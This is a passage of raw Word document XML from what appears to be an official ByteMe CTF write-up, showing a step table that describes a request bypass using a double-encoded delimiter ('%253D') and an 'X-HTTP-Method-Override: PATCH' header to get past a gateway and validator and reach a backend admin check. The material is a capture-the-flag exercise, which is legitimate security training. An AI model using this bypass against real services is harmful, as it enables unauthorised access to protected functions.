          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> delimiter as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%253D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="BE185D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-HTTP-Method-Override: PATCH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>| 5 | Request dispatch | Bypassed Gateway/Validator, triggered backend admin check, received flag |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 xml:space="preserve">ByteMe CTF  •  Author: Pratik Jadhav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ByteMe CTF Writeups  |  Official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